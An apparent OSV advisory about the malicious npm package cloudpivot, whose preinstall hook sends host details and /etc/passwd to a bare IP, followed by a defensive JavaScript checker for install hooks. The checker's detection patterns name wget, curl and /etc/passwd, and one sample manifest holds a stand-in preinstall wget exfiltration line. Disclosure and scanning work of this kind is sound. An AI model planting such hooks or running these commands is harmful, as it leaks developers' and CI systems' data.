cloudpivot @1.0.3
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-4529
Ecosystem: npm
Summary
On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $(whoami), $(pwd), $(hostname), and a base64-encoded copy of /etc/passwd. The package ships no functional code (main: index.js is declared but no index.js is present), so the only effect of installing the package is the exfiltration probe firing automatically. The destination is a bare IP over plain HTTP, with no relation to any declared publisher, and the package description itself references Burp Collaborator abuse. Any developer or CI system that runs npm install cloudpivot leaks host identifiers and the local user database to the operator of 194.120.24.50.
Source: amazon-inspector (4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c)
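One way to flag the traits described in the summary before a package is installed, as an added example that is not part of the advisory or of any scanner's code. The function name auditManifest, the rule set, and both sample manifests are assumptions constructed for illustration; 192.0.2.1 is a documentation-only address.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic rules (assumed for this example) based on the summary's traits.
const RULES = [
  { id: "network-tool", re: /\b(wget|curl)\b/ },
  { id: "command-substitution", re: /\$\([^)]*\)|`[^`]*`/ },
  { id: "plain-http-bare-ip", re: /http:\/\/\d{1,3}(\.\d{1,3}){3}(:\d+)?/ },
  { id: "reads-passwd", re: /\/etc\/passwd/ },
];

// manifestJson: contents of package.json as a string.
// shippedFiles: relative paths of the files present in the package tarball.
function auditManifest(manifestJson, shippedFiles) {
  const pkg = JSON.parse(manifestJson);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const rule of RULES) {
      if (rule.re.test(cmd)) findings.push(`${hook}:${rule.id}`);
    }
  }
  // A declared entry point that is not shipped means the package has no
  // usable code and only its install hooks ever run.
  const main = typeof pkg.main === "string" ? pkg.main.replace(/^\.\//, "") : null;
  if (main && !shippedFiles.includes(main)) findings.push("main-missing");
  return findings;
}

// Constructed samples, not the real package contents.
const SAMPLE_SUSPICIOUS = JSON.stringify({
  name: "example-pkg", version: "0.0.1", main: "index.js",
  scripts: { preinstall: 'wget "http://192.0.2.1:8080/?u=$(whoami)&h=$(hostname)"' },
});
const SAMPLE_BENIGN = JSON.stringify({
  name: "example-lib", version: "1.2.0", main: "index.js",
  scripts: { test: "node test.js", postinstall: "node scripts/build.js" },
});

console.log(auditManifest(SAMPLE_SUSPICIOUS, ["package.json"]));
console.log(auditManifest(SAMPLE_BENIGN, ["package.json", "index.js", "scripts/build.js"]));
```

Running npm install with --ignore-scripts prevents lifecycle hooks such as preinstall from executing, which gives a check like this a chance to run first.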